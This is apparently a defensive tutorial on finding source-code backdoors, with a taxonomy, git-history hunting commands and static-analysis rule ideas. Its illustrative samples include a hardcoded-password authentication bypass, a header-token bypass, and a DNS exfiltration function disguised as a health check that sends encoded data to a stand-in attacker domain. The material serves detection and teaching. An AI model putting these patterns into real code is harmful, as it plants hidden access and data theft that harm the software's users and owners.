Backdoor Taxonomy

Source code backdoors fall into several broad categories, each with distinct detection challenges:

  • Authentication bypass β€” hardcoded credentials, special-case logic that skips authentication for specific inputs
  • Covert channels β€” exfiltration code that sends data to attacker-controlled infrastructure disguised as normal traffic
  • Persistent access β€” code that creates accounts, generates tokens, or leaves debug endpoints accessible post-deployment
  • Logic bombs β€” code that activates based on date, time, user, or environment conditions to avoid detection during testing
  • Cryptographic weakening β€” deliberately weak random number generation, incorrect cipher mode, or key material exfiltration

Authentication Bypass Backdoors

The most common application backdoor is a bypass in authentication logic. They're often introduced as "emergency access" or "debug" features that were never removed:

hardcoded bypass in auth checkPython
def check_authentication(username, password):
    # Normal authentication
    user = db.get_user(username)
    if not user:
        return False

    # Backdoor: hardcoded emergency access
    if password == "s3cr3t-d3bug-2024":
        return True  # bypasses all checks

    return verify_hash(password, user.password_hash)

More sophisticated bypasses encode the special case to avoid obvious string matching:

encoded bypass β€” harder to detectJavaScript
async function authenticate(req) {
  // "feature flag" that is actually a backdoor token check
  if (req.headers['x-internal-token'] === process.env.INTERNAL_BYPASS_TOKEN) {
    return { userId: 'admin', role: 'superuser' };
  }
  // ... normal authentication flow
}

Hardcoded Credential Backdoors

Hardcoded credentials are the most commonly found backdoor type in production code β€” sometimes planted intentionally, sometimes left from development and never removed. Either way, they represent persistent access.

Detection requires scanning for:

  • Password comparisons against string literals: if password == "..."
  • Hardcoded tokens in authentication middleware
  • Embedded certificates or private keys
  • Default credentials in initialisation code that should only run once
  • Admin user creation with hardcoded passwords in database seed files

Seeding scripts are frequently overlooked. Database seed and initialisation scripts often contain default admin credentials. If they're committed to the repository and run in any non-development environment, they create a persistent backdoor account.

Covert Channel Backdoors

Covert channels exfiltrate data to attacker-controlled infrastructure while appearing as legitimate application traffic. Techniques:

  • DNS exfiltration β€” encoding data in DNS lookups to domains the attacker controls (DNS queries are often unmonitored)
  • HTTPS exfiltration disguised as analytics β€” piggybacking data on existing analytics or telemetry calls
  • Timing channels β€” encoding data in the timing of legitimate requests rather than their content
  • Steganographic embedding β€” hiding data in image or file uploads processed by the application
DNS exfiltration disguised as health checkPython
import socket, base64

def _send_health_ping(metric_name, value):
    # Appears to be a metrics call β€” actually exfiltrates data
    encoded = base64.b32encode(str(value).encode()).decode().lower()
    socket.getaddrinfo(
        f"{encoded}.{metric_name}.metrics.attacker.example",
        80
    )

Git History Archaeology

Backdoors planted by insiders often appear in specific commit patterns. Git history analysis can surface them:

git log patterns for backdoor huntingBash
# Find commits that deleted tests (covering their tracks)
git log --all --diff-filter=D -- "**/*test*" "**/*spec*"

# Find large single-author commits without PR review
git log --all --no-merges --author="..." --format="%H %s" \
  | while read hash msg; do
    files=$(git diff-tree --no-commit-id -r --name-only $hash | wc -l)
    [[ $files -gt 20 ]] && echo "$hash ($files files): $msg"
  done

# Find commits modifying authentication-related files
git log --all -S "password" -S "token" -S "bypass" -- "auth/*"

SAST Detection Rules

Static analysis rules for backdoor patterns:

  • Authentication bypass patterns β€” boolean logic that returns true regardless of credential check result; early returns in auth functions based on special inputs
  • Hardcoded secrets in conditionals β€” string comparisons against literals in authentication paths
  • Outbound connections from unexpected code paths β€” network calls from within authentication, logging, or utility functions
  • Environment variable exfiltration β€” reading environment variables and including them in outbound requests
  • Admin account creation in non-migration code β€” calls to user creation functions with elevated roles outside of migration files

Combine SAST with runtime monitoring. SAST catches static patterns. Runtime monitoring catches activated backdoors. A covert channel that connects to an unusual domain on first deployment is a runtime signal that no SAST rule can catch β€” you need egress monitoring too.